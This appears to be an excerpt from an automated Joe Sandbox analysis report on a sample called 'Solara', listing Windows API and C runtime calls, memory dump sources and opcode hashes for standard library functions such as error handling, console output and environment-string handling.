                                                                                                                                        • Part of subcall function 0021C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0021D895,?,00000000,-00000008), ref: 0021C082
                                                                                                                                      • GetLastError.KERNEL32 ref: 00221E2A
                                                                                                                                      • __dosmaperr.LIBCMT ref: 00221E31
                                                                                                                                      • GetLastError.KERNEL32 ref: 00221E6B
                                                                                                                                      • __dosmaperr.LIBCMT ref: 00221E72
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1913693674-0
                                                                                                                                      • Opcode ID: b71d94ffe3739cdebbbdeaf577f0ebc43e4d78e4dee4c0d181224bf7827bca92
                                                                                                                                      • Instruction ID: 95a721e49a107ad998b59e350c94c971096423cbd010f819ce805b82adf2c71c
                                                                                                                                      • Opcode Fuzzy Hash: b71d94ffe3739cdebbbdeaf577f0ebc43e4d78e4dee4c0d181224bf7827bca92
                                                                                                                                      • Instruction Fuzzy Hash: FF21D631624225BFCB20AFE5AC81C6BB7ACFF243647128519FC1593151D731EC708B90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 722b31ca8e9819d1e9e904e67370531fe26005878dac3550cc0733d6f8727e5e
                                                                                                                                      • Instruction ID: d07f5df7419872cec9888869e53dc6f99496184865304930b90054f9bcad9419
                                                                                                                                      • Opcode Fuzzy Hash: 722b31ca8e9819d1e9e904e67370531fe26005878dac3550cc0733d6f8727e5e
                                                                                                                                      • Instruction Fuzzy Hash: 7A219F71224216EF9B20AF658C809EAB7ECFF60364B11451AF95597250EB30EDF48BE0
                                                                                                                                      APIs
                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002231C6
                                                                                                                                        • Part of subcall function 0021C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0021D895,?,00000000,-00000008), ref: 0021C082
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002231FE
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0022321E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 158306478-0
                                                                                                                                      • Opcode ID: 438506718cccd09663b851d53e6607550b165feb887a7310fb3090a311708a08
                                                                                                                                      • Instruction ID: c6daf4b9f0d2a74d85853bba612e0cae61bf6a74bf543653af9d0c204fb0404d
                                                                                                                                      • Opcode Fuzzy Hash: 438506718cccd09663b851d53e6607550b165feb887a7310fb3090a311708a08
                                                                                                                                      • Instruction Fuzzy Hash: B51126B2520126BEA7126BF1BC8DCFF6AACDEA53947100615FE01D1100FFA8DF6045B0
                                                                                                                                      APIs
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000), ref: 0022ADB7
                                                                                                                                      • GetLastError.KERNEL32(?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000,?,?,?,00223CD6,00000000), ref: 0022ADC3
                                                                                                                                        • Part of subcall function 0022AE20: CloseHandle.KERNEL32(FFFFFFFE,0022ADD3,?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000,?,?), ref: 0022AE30
                                                                                                                                      • ___initconout.LIBCMT ref: 0022ADD3
                                                                                                                                        • Part of subcall function 0022ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0022AD91,0022A2DC,?,?,00224390,?,00000000,00000000,?), ref: 0022AE08
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000,?), ref: 0022ADE8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                      • Opcode ID: 52c2eda6632a463cf493cbb4a12d9a8813ff67ddb8c5704cf0f8e79576f97095
                                                                                                                                      • Instruction ID: 1bf040765187c12de49108523e503f91953c96913b5ef05114f41fa94e4318fb
                                                                                                                                      • Opcode Fuzzy Hash: 52c2eda6632a463cf493cbb4a12d9a8813ff67ddb8c5704cf0f8e79576f97095
                                                                                                                                      • Instruction Fuzzy Hash: 20F0A536514129BBCF222FD5FC0C99A7F2AFF497A2B158011FE1996520DB728C70AB91
                                                                                                                                      APIs
                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00210507
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00210516
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0021051F
                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0021052C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                      • Opcode ID: 0b6a34b65c2d5d75c98ef3466b77d2ddaf6f591ea9ba62189a6f9068e181be5c
                                                                                                                                      • Instruction ID: 705b04da74523c25aefb40997117b4e1cc6ef16524ec99257403520457a5d74c
                                                                                                                                      • Opcode Fuzzy Hash: 0b6a34b65c2d5d75c98ef3466b77d2ddaf6f591ea9ba62189a6f9068e181be5c
                                                                                                                                      • Instruction Fuzzy Hash: C8F06274D1020DEBCB00DFB4EA4D99EBBF8FF1C200B918996E412E7110EB30AB449B50
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(7D787C77), ref: 0042B401
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: w|x}${twu
                                                                                                                                      • API String ID: 3664257935-2056895081
                                                                                                                                      • Opcode ID: f539b04b79fbd5a4ee96ab0cc1500a14f2fd8363b97cca63592658fd2fef03a9
                                                                                                                                      • Instruction ID: ad4eca1e8878c599869501c4a4c834edc0f3a287093d1f4f6bd4605c54d815ff
                                                                                                                                      • Opcode Fuzzy Hash: f539b04b79fbd5a4ee96ab0cc1500a14f2fd8363b97cca63592658fd2fef03a9
                                                                                                                                      • Instruction Fuzzy Hash: 134106702047919BD325CB26D8A0B23BFA2FF56304F28449DE8D74B792D776A806CB55
                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0021B893,?,?,00000000,00000000,00000000,?), ref: 0021B9B7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                      • Opcode ID: 1751927071cd287e5c88d93c3276c0e6b44ec5ac347b5cd2895ddcc1331e7170
                                                                                                                                      • Instruction ID: 0fa30f31161f47f40f510c627690f1230dc360bdd2dec2c5ed28d76b3d1338f5
                                                                                                                                      • Opcode Fuzzy Hash: 1751927071cd287e5c88d93c3276c0e6b44ec5ac347b5cd2895ddcc1331e7170
                                                                                                                                      • Instruction Fuzzy Hash: 0641587291020AAFCF16DF94CD81AEEBBF5BF58300F188199FA14A7211D33599A1DF91
                                                                                                                                      APIs
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0021B475
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___except_validate_context_record
                                                                                                                                      • String ID: csm$csm
                                                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                                                      • Opcode ID: 63e6f2f8acef846649f289196d197701d653ebf00a9b9ce66aef5b5918743466
                                                                                                                                      • Instruction ID: be8229ece32eb8eb03166fae194580bf0e8fc8b6924bbc3aee15c0993f5f4772
                                                                                                                                      • Opcode Fuzzy Hash: 63e6f2f8acef846649f289196d197701d653ebf00a9b9ce66aef5b5918743466
                                                                                                                                      • Instruction Fuzzy Hash: 6231C17642021AEBCF238F50C8449EA7BBBEB28314B58825AF84449122D332DDF1DBD1
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                                      • Opcode ID: 3efe5e15a040c20ad3956fb72348d2255a859aad6db8ca8fd35423a25da7e847
                                                                                                                                      • Instruction ID: a4c36ad8ef0da8643507f4b97a195c025e35b17d4a145554757d969e10ed3f8c
                                                                                                                                      • Opcode Fuzzy Hash: 3efe5e15a040c20ad3956fb72348d2255a859aad6db8ca8fd35423a25da7e847
                                                                                                                                      • Instruction Fuzzy Hash: 2C31B4F49143148FDB00EF68DA84649BBF4BF89304F51856EF498DB360D7B4A948CB82
                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0020B8B9
                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?), ref: 0020B8DE
                                                                                                                                        • Part of subcall function 0021060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0020F354,00000000,?,?,?,0020F354,00203D4A,0023759C,00203D4A), ref: 0021066D
                                                                                                                                        • Part of subcall function 00218353: IsProcessorFeaturePresent.KERNEL32(00000017,0021378B,?,?,?,?,00000000,?,?,?,0020B5AC,0020B4E0,00000000,?,?,0020B4E0), ref: 0021836F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 1924019822-1018135373
                                                                                                                                      • Opcode ID: ac5f53bf3b6b9ed2dece163664009ffda035412d38e0f51c80c173edb03aeaa7
                                                                                                                                      • Instruction ID: d23a64481f0f8dd333442f91b3118aa201e4550dbd1a39fd43d75c652f076da9
                                                                                                                                      • Opcode Fuzzy Hash: ac5f53bf3b6b9ed2dece163664009ffda035412d38e0f51c80c173edb03aeaa7
                                                                                                                                      • Instruction Fuzzy Hash: 2F219031D1031DEBCF36DF95D849AEEB7B8AF54710F184409E505AB1A2CB70AD65CB81
                                                                                                                                      APIs
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00202673
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___std_exception_copy
                                                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                                                      • API String ID: 2659868963-1158432155
                                                                                                                                      • Opcode ID: 900093027eec3d485880b470cb47ee4bfd05eeafb4e3b4173c98f43f4418dcbf
                                                                                                                                      • Instruction ID: aded9947e00df311e48c486714c02fcb1033ce9886c01ee909f178529cbbf44b
                                                                                                                                      • Opcode Fuzzy Hash: 900093027eec3d485880b470cb47ee4bfd05eeafb4e3b4173c98f43f4418dcbf
                                                                                                                                      • Instruction Fuzzy Hash: 3D01D4F1524305ABDB14DF28E856A5A7BE8AF18318F00881CF4599B351D376E968CB81
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0020F354,00000000,?,?,?,0020F354,00203D4A,0023759C,00203D4A), ref: 0021066D
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00202673
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                                                      • API String ID: 3109751735-1158432155
                                                                                                                                      • Opcode ID: 3a091ecabf108bb24c8a22d232eddc0bd30bd3e776c84db78c74645e5f6b1ddb
                                                                                                                                      • Instruction ID: 578e92895e6a201dae27cebb0ad3b06f97f9c027664929010d58e4ce635e6d75
                                                                                                                                      • Opcode Fuzzy Hash: 3a091ecabf108bb24c8a22d232eddc0bd30bd3e776c84db78c74645e5f6b1ddb
                                                                                                                                      • Instruction Fuzzy Hash: 22F0F8F1524310ABD700AF58E84A74BBBE8EB59718F01881CF598AB311D3B5D5A8CF92